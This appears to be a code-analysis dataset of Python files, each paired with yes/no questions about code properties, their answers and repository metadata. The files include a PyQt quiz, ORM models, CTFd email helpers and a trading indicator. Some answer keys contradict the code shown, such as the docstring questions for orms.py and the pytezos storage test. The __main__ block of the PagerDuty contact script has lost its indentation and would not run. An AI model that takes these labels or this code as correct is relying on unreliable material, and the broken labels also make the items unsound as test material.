    """Render *comment* as '//'-style lines, hard-wrapped every *length* chars."""
    chunks = (comment[i : i + length] for i in range(0, len(comment), length))
    return "".join(indentation + "// " + chunk + "\n" for chunk in chunks)
# Generates C++ pointer data references from an XML element
def getDataReference(element, root):
    """Join the ids of *element*'s ancestors (from *root* down) with '->'."""
    # Find the direct parent of `element` anywhere in the tree.
    parent = next((node for node in root.iter() if element in node), None)
    if parent is None:
        # No node contains `element`: it is the root itself.
        return root.attrib["id"]
    return getDataReference(parent, root) + "->" + element.attrib["id"]


def capitalize(string):
    """Upper-case only the first character, leaving the rest untouched."""
    first = string.capitalize()[0]
    return first + string[1:]


def getMutexReference(struct, root):
    """C++ reference to the mutex member guarding *struct*."""
    return getDataReference(struct, root) + "->" + struct.attrib["id"] + "Mutex"


def getGetReference(struct, field):
    """Name of the generated getter for *field* of *struct*."""
    return "get" + capitalize(struct.attrib["id"]) + capitalize(field.attrib["id"])


def getSetReference(struct, field):
    """Name of the generated setter for *field* of *struct*."""
    return "set" + capitalize(struct.attrib["id"]) + capitalize(field.attrib["id"])
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | autocoding/util.py | badgerloop-software/pod-embedded-beta |
from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1VwGoijY62ze1w9iTaCum7ybMyGcw2Uep5(TestCase):
    """Round-trip and parsing tests for contract KT1VwGoijY62ze1w9iTaCum7ybMyGcw2Uep5."""

    @classmethod
    def setUpClass(cls):
        """Load the contract fixture once for all tests."""
        cls.maxDiff = None
        cls.contract = get_data('storage/carthagenet/KT1VwGoijY62ze1w9iTaCum7ybMyGcw2Uep5.json')

    def test_storage_encoding_KT1VwGoijY62ze1w9iTaCum7ybMyGcw2Uep5(self):
        """Decoding and re-encoding the storage must round-trip exactly."""
        storage_type = self.contract['script']['code'][1]
        storage_value = self.contract['script']['storage']
        schema = build_schema(storage_type)
        decoded = decode_micheline(storage_value, storage_type, schema)
        self.assertEqual(storage_value, encode_micheline(decoded, schema))

    def test_storage_schema_KT1VwGoijY62ze1w9iTaCum7ybMyGcw2Uep5(self):
        """The parameter section must produce a schema without raising."""
        _ = build_schema(self.contract['script']['code'][0])

    def test_storage_format_KT1VwGoijY62ze1w9iTaCum7ybMyGcw2Uep5(self):
        """Code and storage must convert to Michelson without raising."""
        _ = micheline_to_michelson(self.contract['script']['code'])
        _ = micheline_to_michelson(self.contract['script']['storage'])
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | tests/storage/cases/test_KT1VwGoijY62ze1w9iTaCum7ybMyGcw2Uep5.py | juztin/pytezos-1 |
#!/usr/bin/env python
import argparse
import pdpyras
import sys
# Disables noisy warning logging from pdpyras
import logging
logging.disable(logging.WARNING)
# Get all users' contact methods.
# Originally by Ryan Hoskin
def get_users(session):
    """Print every user's name and contact methods to stdout."""
    sys.stdout.write("Listing All Users' Contact Methods:\n")
    for user in session.iter_all('users'):
        sys.stdout.write("User: %s\n" % user['name'])
        get_contact_methods(user['id'], session)
        sys.stdout.write("-----\n")
def get_contact_methods(user_id, session):
    """Print one line per contact method of the given user id."""
    for method in session.iter_all('users/%s/contact_methods' % user_id):
        kind = method['type']
        # 'phone' must be tested before 'sms'/'email' since the type string
        # is matched by substring.
        if 'phone' in kind:
            sys.stdout.write("Phone: %s %s" % (method['country_code'],
                                               method['address']))
        elif 'sms' in kind:
            sys.stdout.write("SMS: %s %s" % (method['country_code'],
                                             method['address']))
        elif 'email' in kind:
            sys.stdout.write("Email: %s" % method['address'])
        elif 'push_notification' in kind:
            sys.stdout.write("Push: %s" % method['label'])
        sys.stdout.write("\n")
if __name__ == '__main__':
ap = argparse.ArgumentParser(description="Retrieves contact info for all "
"users in a PagerDuty account")
ap.add_argument('-k', '--api-key', required=True, help="REST API key")
args = ap.parse_args()
session = pdpyras.APISession(args.api_key)
get_users(session)
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than... | 3 | get_info_on_all_users/contact_methods.py | DuncanMillard/public-support-scripts |
# import the required Qt classes
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QLabel,QVBoxLayout,QHBoxLayout, QMessageBox, QRadioButton
# create the application and the main quiz window
app=QApplication([])
main_win =QWidget()
main_win.setWindowTitle('Конкурс от Crazy People')
# the question label and the four answer options
question =QLabel("В каком году канал получил золотую кнопку от YouTube?")
btn_answer1 =QRadioButton('2005')
btn_answer2 =QRadioButton('2010')
btn_answer3 =QRadioButton('2015')
btn_answer4 =QRadioButton('2020')
# vertical main layout with three horizontal rows:
# the question on top, then two rows of two answers each
layout_main=QVBoxLayout()
h1=QHBoxLayout()
h2=QHBoxLayout()
h3=QHBoxLayout()
h1.addWidget(question,alignment =Qt.AlignCenter)
h2.addWidget(btn_answer1,alignment =Qt.AlignCenter)
h2.addWidget(btn_answer2,alignment =Qt.AlignCenter)
h3.addWidget(btn_answer3,alignment =Qt.AlignCenter)
h3.addWidget(btn_answer4,alignment =Qt.AlignCenter)
layout_main.addLayout(h1)
layout_main.addLayout(h2)
layout_main.addLayout(h3)
main_win.setLayout(layout_main)
def win():
    """Show the 'correct answer' message box."""
    box = QMessageBox()  # renamed: local used to shadow the function name
    box.setText('Верно!')
    box.exec_()
def lose():
    """Show the 'wrong answer' consolation message box."""
    box = QMessageBox()  # renamed: local used to shadow the function name
    box.setText('«Нет, в 2015 году. Вы выиграли фирменный плакат')
    box.exec_()
btn_answer1.clicked.connect(lose)
btn_answer2.clicked.connect(lose)
btn_answer3.clicked.connect(win)
btn_answer4.clicked.connect(lose)
main_win.show()
app.exec_()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | youtube_contest.py | all0ws/cryze-peple |
from orator import Model
from orator.orm import belongs_to_many,has_many,belongs_to
from config import db
Model.set_connection_resolver(db)
class Entry(Model):
    """ORM model: an entry with a location; many-to-many with Tran."""
    __fillable__ = ['location']
    @belongs_to_many
    def trans(self):
        # many-to-many relationship to Tran
        return Tran
class Tran(Model):
    """ORM model: a named/typed tran; many-to-many with Entry and Train."""
    __fillable__ = ['name','type']
    @belongs_to_many
    def entries(self):
        # many-to-many relationship to Entry
        return Entry
    @belongs_to_many
    def trains(self):
        # many-to-many relationship to Train
        return Train
class Train(Model):
    """ORM model: a named train; many-to-many with Tran, has many Results."""
    __fillable__ = ['name']
    @belongs_to_many
    def trans(self):
        # many-to-many relationship to Tran
        return Tran
    @has_many
    def results(self):
        # one-to-many relationship to Result
        return Result
class Result(Model):
    """ORM model: a key/value result belonging to a Train."""
    __fillable__ = ['key','value']
    @belongs_to
    def trains(self):
        # belongs_to: each Result references a single Train
        # (method name is plural, but the relation is singular)
        return Train
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
... | 3 | orms.py | cliuxinxin/mukeniao2 |
import torch
from torch import nn
from torch.nn import functional as F
LAYER1_NODE = 10240
def weights_init(m):
    """Xavier-initialize Conv2d weights and set biases to 0.01.

    Intended to be passed to ``Module.apply``; non-Conv2d modules are skipped.
    """
    if type(m) == nn.Conv2d:
        # fix: the non-underscore nn.init.xavier_uniform / nn.init.constant
        # names are deprecated and removed in current torch; the in-place
        # `_` variants are the supported equivalents
        nn.init.xavier_uniform_(m.weight.data)
        nn.init.constant_(m.bias.data, 0.01)
class TxtModule(nn.Module):
    """Two-layer fully-convolutional text encoder emitting tanh codes in (-1, 1)."""

    def __init__(self, y_dim, bit):
        """
        :param y_dim: dimension of tags
        :param bit: bit number of the final binary code
        """
        super(TxtModule, self).__init__()
        self.module_name = "text_model"
        # full-conv layers: the (y_dim x 1) kernel collapses the tag axis
        self.conv1 = nn.Conv2d(1, LAYER1_NODE, kernel_size=(y_dim, 1), stride=(1, 1))
        self.conv2 = nn.Conv2d(LAYER1_NODE, bit, kernel_size=1, stride=(1, 1))
        self.apply(weights_init)
        self.classifier = nn.Sequential(
            self.conv1,
            nn.ReLU(inplace=True),
            nn.Dropout(),
            self.conv2,
        )

    def forward(self, x):
        """Map the input tensor to a squeezed, tanh-activated code."""
        features = self.classifier(x).squeeze()
        return torch.tanh(features)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "any_function_over_40_lines",
"question": "Is any function in this file longer than 40 lin... | 3 | DCHUC/utils/txt_module.py | BMC-SDNU/Cross-Modal-Hashing-Retrieval |
# -*- coding: utf-8 -*-
# @File : XGBoostLRDataProcess.py
# @Author : Hua Guo
# @Disc :
from sklearn.preprocessing import OneHotEncoder
from sklearn.base import TransformerMixin, BaseEstimator
from xgboost.sklearn import XGBModel
from copy import deepcopy
from xgboost.sklearn import XGBClassifier
import logging
logging.getLogger(__name__)
class XGBoostLRDataProcess(TransformerMixin, BaseEstimator):
    """Transformer: XGBoost leaf indices, one-hot encoded (GBDT + LR feature stage)."""

    def __init__(self) -> None:
        self.xgb = XGBClassifier()
        self.one_hot = OneHotEncoder()

    def fit(self, X, y):
        """Fit the booster on (X, y), then fit the encoder on its leaf indices."""
        features = deepcopy(X)
        self.xgb.fit(
            X=features, y=y,
            verbose=True,
            eval_metric='logloss',
            eval_set=[[features, y]],
        )
        self.one_hot.fit(self.xgb.apply(features))
        return self

    def transform(self, X, y=None):
        """Return the one-hot encoding of X's leaf indices."""
        return self.one_hot.transform(self.xgb.apply(X))
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answe... | 3 | src/DataPreprocess/XGBoostLRDataProcess.py | xiaoye-hua/recommendation_system |
import numpy as np
import pandas as pd
class DataModel:
    """
    This class implements a data model - values at time points and provides methods for working with these data.
    """
    def __init__(self, n=0, values=None, times=None):
        """
        A constructor that takes values and a time point.

        :param n: Number of zero-initialized slots used when no data is given
        :param values: Array of values process
        :param times: Array of a time points
        :raises ValueError: if values and times have different lengths
        """
        if (values is None) or (times is None):
            self._times = np.zeros((n, ))
            self._values = np.zeros((n, ))
        else:
            if len(values) != len(times):
                # Bug fix: previously this only printed a message and left the
                # object without _times/_values attributes.
                raise ValueError("Different size of values and times")
            self._times = np.array(times, dtype=float)
            self._values = np.array(values, dtype=float)

    def print(self, n=None):
        """Print the first n (time, value) pairs; all of them when n is None."""
        # Robustness fix: _n could previously be left unbound.
        _n = n if n is not None else self._times.shape[0]
        for i in range(_n):
            print("Time: {}___Value: {}".format(self._times[i], self._values[i]))

    @property
    def mean(self):
        """
        :return: Mean of values
        """
        # Bug fix: previously averaged the time points, contradicting the docstring.
        return self._values.mean()

    def get_values(self):
        return self._values

    def get_times(self):
        return self._times

    def add_value(self, value, index):
        """Overwrite the value stored at position index."""
        self._values[index] = value

    def add_time(self, time, index):
        """Overwrite the time stored at position index."""
        self._times[index] = time

    def get_value(self, index):
        return self._values[index]

    def get_time(self, index):
        return self._times[index]
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding sel... | 3 | model/src/DataModel.py | roman-baldaev/course-project |
from behave import *
from behave.log_capture import capture
import tempfile
import shutil
@capture()
def before_scenario(context, scenario):
    """Create a scratch directory and fresh tracking lists for each scenario."""
    context.working_directory = tempfile.mkdtemp()
    # entities mentioned during steps accumulate in these lists
    for attr in ("cells", "files", "file_contents", "notebooks"):
        setattr(context, attr, [])
@capture()
def after_scenario(context, scenario):
    # Remove the scenario's temporary working directory and everything in it.
    shutil.rmtree(context.working_directory)
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | features/environment.py | alpine-data/synbconvert |
import logging
from typing import Any, Awaitable, Callable, Dict, Optional
from aiogram import BaseMiddleware
from aiogram.dispatcher.event.handler import HandlerObject
from aiogram.types import TelegramObject, User
from aiolimiter import AsyncLimiter
logger = logging.getLogger(__name__)
class ThrottlingMiddleware(BaseMiddleware):
    """Per-user rate limiting via aiolimiter.

    Handlers opt in with flags: `throttling_key` (required) and
    `throttling_rate` (AsyncLimiter time period, default `default_rate`).
    Throttled events are dropped: the handler is not called and the
    middleware implicitly returns None.
    """
    def __init__(self, default_rate: int = 2) -> None:
        # One AsyncLimiter per "<user_id>:<throttling_key>" pair.
        self.limiters: Dict[str, AsyncLimiter] = {}
        self.default_rate = default_rate
    async def __call__(
        self,
        handler: Callable[[TelegramObject, Dict[str, Any]], Awaitable[Any]],
        event: TelegramObject,
        data: Dict[str, Any],
    ) -> Any:
        user: Optional[User] = data.get("event_from_user")
        # get the real handler that will be called at the end of chain
        real_handler: HandlerObject = data["handler"]
        # get settled throttling flags from handler
        throttling_key = real_handler.flags.get("throttling_key", None)
        throttling_rate = real_handler.flags.get("throttling_rate", self.default_rate)
        # no throttling flag or anonymous event: pass straight through
        if not throttling_key or not user:
            return await handler(event, data)
        # AsyncLimiter(1, rate): at most one event per `rate` period
        limiter = self.limiters.setdefault(
            f"{user.id}:{throttling_key}", AsyncLimiter(1, throttling_rate)
        )
        if limiter.has_capacity():
            async with limiter:
                return await handler(event, data)
        else:
            # over the limit: log and drop the event (returns None)
            logger.info(
                "Throttled for user=%d, key=%s, rate=%d",
                user.id,
                throttling_key,
                throttling_rate,
            )
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (exc... | 3 | bot/middlewares/throttling.py | darksidecat/telegram-2048-bot |
"""add
Revision ID: 5edcaaadde99
Revises: a1d970c1214f
Create Date: 2019-03-18 09:41:06.484761
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '5edcaaadde99'
down_revision = 'a1d970c1214f'
branch_labels = None
depends_on = None
def upgrade():
    """Add nullable gender, language and signature columns to the user table."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('user', sa.Column('gender', sa.String(length=30), nullable=True))
    op.add_column('user', sa.Column('language', sa.String(length=30), nullable=True))
    op.add_column('user', sa.Column('signature', sa.String(length=100), nullable=True))
    # ### end Alembic commands ###
def downgrade():
    """Drop the columns added in upgrade (reverse order)."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('user', 'signature')
    op.drop_column('user', 'language')
    op.drop_column('user', 'gender')
    # ### end Alembic commands ###
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | migrations/versions/5edcaaadde99_add.py | 13460991260/shop |
from collections import namedtuple
import numpy as np
from jesse.helpers import get_candle_source, np_shift, slice_candles
AG = namedtuple('AG', ['jaw', 'teeth', 'lips'])
def alligator(candles: np.ndarray, source_type: str = "close", sequential: bool = False) -> AG:
    """
    Alligator: three shifted EWMAs (jaw 13/8, teeth 8/5, lips 5/3)

    :param candles: np.ndarray
    :param source_type: str - default: "close"
    :param sequential: bool - default=False
    :return: AG(jaw, teeth, lips)
    """
    candles = slice_candles(candles, sequential)
    source = get_candle_source(candles, source_type=source_type)
    # (ewma window, forward shift) per alligator line
    specs = {"jaw": (13, 8), "teeth": (8, 5), "lips": (5, 3)}
    lines = {
        name: np_shift(numpy_ewma(source, window), shift, fill_value=np.nan)
        for name, (window, shift) in specs.items()
    }
    if not sequential:
        return AG(lines["jaw"][-1], lines["teeth"][-1], lines["lips"][-1])
    return AG(lines["jaw"], lines["teeth"], lines["lips"])
def numpy_ewma(data: np.ndarray, window: int):
    """Exponentially weighted moving average with alpha = 1/window.

    Matches pandas' ewm(alpha=1/window, adjust=True).mean() formulation.

    :param data: 1-D input array
    :param window: smoothing window; alpha = 1/window
    :return: np.ndarray of the same length as data
    """
    alpha = 1 / window
    # fix: removed the unused local `scale = 1 / (1 - alpha)`
    n = data.shape[0]
    scale_arr = (1 - alpha) ** (-1 * np.arange(n))
    weights = (1 - alpha) ** np.arange(n)
    pw0 = (1 - alpha) ** (n - 1)
    mult = data * pw0 * scale_arr
    cumsums = mult.cumsum()
    return cumsums * scale_arr[::-1] / weights.cumsum()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
... | 3 | jesse/indicators/alligator.py | noenfugler/jesse |
compression_methods = ['']
_blosc_methods = ['blosc-blosclz', 'blosc-lz4']
try:
import blosc
HAVE_BLOSC = True
compression_methods.extend(_blosc_methods)
except ImportError:
HAVE_BLOSC = False
def compress(data, method, *args, **kwds):
    """Compress ``data`` with ``method``; an empty method string means no-op."""
    if method == '':
        return data
    _check_method(method)
    if not method.startswith('blosc-'):
        raise ValueError("Unknown compression method '%s'" % method)
    # The text after 'blosc-' selects the blosc codec (e.g. 'blosclz', 'lz4').
    kwds['cname'] = method[6:]
    return blosc.compress(data, *args, **kwds)
def decompress(data, method, *args, **kwds):
    """Decompress ``data`` that was produced by :func:`compress` with ``method``."""
    if method == '':
        return data
    _check_method(method)
    if method.startswith('blosc-'):
        # NOTE(review): extra *args/**kwds are accepted but not forwarded to
        # blosc.decompress — looks intentional for API symmetry; TODO confirm.
        return blosc.decompress(data)
    raise ValueError("Unknown compression method '%s'" % method)
def _check_method(method):
    """Raise ValueError if ``method`` is unknown or unusable in this process."""
    if method in compression_methods:
        return
    if method in _blosc_methods:
        # The method itself is valid, but blosc failed to import at load time.
        raise ValueError("Cannot use %s compression; blosc package is not importable." % method)
    raise ValueError('Unknown compression method "%s"' % method)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | pyacq/core/stream/compression.py | cimbi/pyacq |
# Everything covered in oop
class RegisterUser:
    """OOP demo class showing instance, class and static methods."""

    # Class attribute: shared by every instance.
    user_ref_id = 100

    def __init__(self, username, email, passcode):
        # Per-instance state set at construction time.
        self.username = username
        self.email = email
        self.passcode = passcode

    def register_new_user(self):
        """Greet the user with their registration details (instance method)."""
        return f"Hello {self.username}, your email is {self.email}"

    @classmethod
    def describe_full_user(cls, dob, reg_date):
        """Class method: callable on the class itself, without instantiation."""
        return f"Hello your reg_date is {reg_date} and dob is {dob} with passcode"

    @staticmethod
    def maximum_salary_finder(*args):
        """Static method: uses no class or instance state at all."""
        return max(args)
# Instantiate a basic object.
user_ = RegisterUser("kpodo", "napthanewman@gmail.com", "argentina33")
# Call an instance method through the instantiated object.
print(user_.register_new_user())
# @staticmethod used without instantiation; the class accesses the method directly.
print(RegisterUser.maximum_salary_finder(10, 390, 18, 100))
# @classmethod used similarly to the static method.
print(RegisterUser.describe_full_user("April 6, 2020", "April 4, 2020"))
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than cla... | 3 | OOP/review.py | danielkpodo/python-zero-to-mastery |
import unittest
import numpy as np
from numba import autojit
mu = 0.1
Lx, Ly = 101, 101
@autojit
def diffusionObstacleStep(u,tempU,iterNum):
    """Run ``iterNum`` explicit diffusion update steps.

    Reads from tempU and writes into u over the interior cells
    (1..Lx-2, 1..Ly-2); the boundary is never written. The buffers are
    swapped after each outer iteration.
    """
    for n in range(iterNum):
        for i in range(1, Lx - 1):
            for j in range(1, Ly - 1):
                # 5-point Laplacian stencil scaled by the diffusion constant mu.
                u[i,j] = mu * (tempU[i+1,j]-2*tempU[i,j]+tempU[i-1,j] +
                               tempU[i,j+1]-2*tempU[i,j]+tempU[i,j-1])
        # Bug in Meta??
        # tempU, u = u, tempU
        # -> Assign(targets=[Name(id='tempU', ctx=Store()),
        #                    Name(id='u', ctx=Store())],
        #          value=Name(id='u', ctx=Load()))
        # Manual three-step swap as a workaround for the tuple-swap
        # miscompilation described above.
        temp = u
        u = tempU
        tempU = temp
def get_arrays():
    """Return (tempU, u) zeroed grids with a point heat source at the center of u."""
    u = np.zeros([Lx, Ly], dtype=np.float64)
    tempU = np.zeros([Lx, Ly], dtype=np.float64)
    # Use floor division: `Lx / 2` yields a float under Python 3, and float
    # array indices are rejected by NumPy.
    u[Lx // 2, Ly // 2] = 1000.0
    return tempU, u
def test_diffusion():
    """Check that the jitted kernel matches the pure-Python implementation."""
    tempU, u = get_arrays()
    iterNum = 10
    diffusionObstacleStep(u, tempU, iterNum)
    # .py_func invokes the original, un-jitted Python function on fresh arrays
    # so the two results can be compared.
    tempU_numpy, u_numpy = get_arrays()
    diffusionObstacleStep.py_func(u_numpy, tempU_numpy, iterNum)
    print(u)
    print(u_numpy)
    assert np.allclose(u, u_numpy)
if __name__ == "__main__":
test_diffusion()
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written... | 3 | numba/tests/test_diffusion.py | liuzhenhai/numba |
from flask import current_app as app, url_for
from CTFd.utils import get_config, get_app_config
from CTFd.utils.config import get_mail_provider, mailserver
from CTFd.utils.email import mailgun, smtp
from CTFd.utils.security.signing import serialize
import re
EMAIL_REGEX = r"(^[^@\s]+@[^@\s]+\.[^@\s]+$)"
def sendmail(addr, text):
    """Send ``text`` to ``addr`` via whichever mail provider is configured.

    Returns the backend's (success, message) result, or
    (False, "No mail settings configured") when no provider is set.
    """
    backends = {'smtp': smtp.sendmail, 'mailgun': mailgun.sendmail}
    backend = backends.get(get_mail_provider())
    if backend is None:
        return False, "No mail settings configured"
    return backend(addr, text)
def forgot_password(email, team_name):
    """Email a password-reset link containing a signed token for ``team_name``."""
    # The token is a signed serialization of the team name; the reset view
    # verifies the signature before allowing a password change.
    token = serialize(team_name)
    text = """Did you initiate a password reset? Click the following link to reset your password:
{0}/{1}
""".format(url_for('auth.reset_password', _external=True), token)
    sendmail(email, text)
def verify_email_address(addr):
    """Email a confirmation link containing a signed token for ``addr``."""
    # The signed token proves the confirmation link was issued by this server.
    token = serialize(addr)
    text = """Please click the following link to confirm your email address for {ctf_name}: {url}/{token}""".format(
        ctf_name=get_config('ctf_name'),
        url=url_for('auth.confirm', _external=True),
        token=token
    )
    sendmail(addr, text)
def check_email_format(email):
    """Return True when ``email`` has the shape local@domain.tld with no whitespace."""
    # Same pattern as the module-level EMAIL_REGEX constant, inlined here.
    return re.match(r"(^[^@\s]+@[^@\s]+\.[^@\s]+$)", email) is not None
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answ... | 3 | CTFd/utils/email/__init__.py | ramadistra/CTFd |
import os
from step_project.utils.import_methods import import_pygraphviz
from common_utils.file_utils import get_settings
def create_project_graph(project, output_filename='project_graph'):
    """Build a dependency graph of the project's steps and render it.

    Scans subdirectories of the CWD that contain a description.yml, adds one
    node per step, and one edge per predecessor step labelled with the command.
    """
    nodes = []
    edges = []
    for dirname in sorted(os.listdir('.')):
        if not os.path.isdir(dirname) or \
                not os.path.isfile(os.path.join(dirname, 'description.yml')):
            continue
        step = project.read_step(dirname, no_check=True)
        name = step.directory
        # Unfinished steps are flagged with a leading '* ' in their label.
        label = name if step.is_completed() else '* ' + name
        nodes.append((name, dict(label=label)))
        prev_steps = step._step_data['prev_steps']
        if prev_steps:
            command = step._step_data['command']
            edges.extend((prev, name, dict(label=command)) for prev in prev_steps)
    create_graph_from_data(nodes, edges, output_filename)
def create_graph_from_data(nodes, edges, output_filename):
    """Write a directed graph of (nodes, edges) as .dot and .ps files.

    Opens the PostScript file in the configured viewer, if any is set.
    """
    pygraphviz = import_pygraphviz()
    graph_attrs = dict(strict=True, directed=True)
    if len(nodes) > 10:
        # Wide graphs read better laid out left-to-right.
        graph_attrs['rankdir'] = 'LR'
    graph = pygraphviz.AGraph(**graph_attrs)
    for node_name, node_attrs in nodes:
        graph.add_node(node_name, **node_attrs)
    for from_node, to_node, edge_attrs in edges:
        graph.add_edge(from_node, to_node, **edge_attrs)
    # Export: always write the .dot source, plus a PostScript render using
    # the 'dot' layout engine.
    graph.write(output_filename + '.dot')
    ps_file = output_filename + '.ps'
    graph.draw(ps_file, prog='dot')
    ps_viewer = get_settings()['ps_viewer']
    if ps_viewer:
        # NOTE(review): shell command assembled from local settings — fine for
        # a local tool, but do not pass untrusted paths through os.system.
        os.system(f"{ps_viewer} {ps_file}")
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fe... | 3 | step_project/common/graph/project_graph.py | CroP-BioDiv/zcitools |
import numpy as np
from cobras_ts.superinstance import SuperInstance
def get_prototype(A, indices):
    """Return the index from ``indices`` with the highest total affinity.

    ``A`` is an affinity matrix; an index's score is the sum of its
    affinities to every other index in ``indices``. Ties keep the earliest.
    """
    best_idx = None
    best_affinity = -np.inf
    for candidate in indices:
        total = sum(A[candidate, other] for other in indices if other != candidate)
        if total > best_affinity:
            best_idx = candidate
            best_affinity = total
    return best_idx
class SuperInstance_DTW(SuperInstance):
    """Super-instance whose ``data`` is an affinity matrix (e.g. built with DTW)."""

    def __init__(self, data, indices, train_indices, parent=None):
        """Pick the representative as the training index with the highest
        total affinity to the other training indices (see get_prototype)."""
        super(SuperInstance_DTW, self).__init__(data, indices, train_indices, parent)
        self.representative_idx = get_prototype(self.data, self.train_indices)

    def distance_to(self, other_superinstance):
        """Negated affinity between the two representatives.

        Not a true distance metric, but COBRAS only uses this value for
        ordering, so that is sufficient.
        """
        return -self.data[self.representative_idx, other_superinstance.representative_idx]
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | cobras_ts/superinstance_dtw.py | Pica4x6/cobras |
from PyQt5.Qt import QMainWindow, QTabWidget, QAction
from pyqt_sql_demo.widgets.connection import ConnectionWidget
class MainWindow(QMainWindow):
    """Top-level window: one closable tab per DB connection, plus a Connection menu."""

    def __init__(self):
        super().__init__()
        self.setMinimumWidth(640)
        self.setMinimumHeight(480)

        # Central widget: a tab bar with user-closable tabs.
        self.tab_widget = QTabWidget(self)
        self.tab_widget.setTabsClosable(True)
        self.tab_widget.tabCloseRequested.connect(self.on_tab_close_clicked)
        self.setCentralWidget(self.tab_widget)

        # "Connection" menu with Create / Close actions.
        connection_menu = self.menuBar().addMenu("Connection")

        create_action = QAction("Create", self)
        create_action.triggered.connect(self.add_new_tab)
        connection_menu.addAction(create_action)

        close_action = QAction("Close", self)
        close_action.triggered.connect(self.close_current_tab)
        connection_menu.addAction(close_action)

        # Start with a single empty connection tab.
        self.add_new_tab()

    def add_new_tab(self):
        """Open a fresh, untitled connection tab."""
        connection = ConnectionWidget(self.tab_widget)
        connection.title_changed.connect(self.on_tab_name_changed)
        self.tab_widget.addTab(connection, "Untitled")

    def close_current_tab(self):
        """Close whichever tab is currently selected."""
        self.tab_widget.removeTab(self.tab_widget.currentIndex())

    def on_tab_close_clicked(self, idx):
        """Handle the per-tab close button."""
        self.tab_widget.removeTab(idx)

    def on_tab_name_changed(self, widget, name):
        """Rename the tab hosting ``widget``; no-op if it is no longer present."""
        idx = self.tab_widget.indexOf(widget)
        if idx != -1:
            self.tab_widget.setTabText(idx, name)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | pyqt_sql_demo/widgets/main.py | nshiell/pyqt-sql-demo |
# Copyright (c) 2018 StackHPC Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
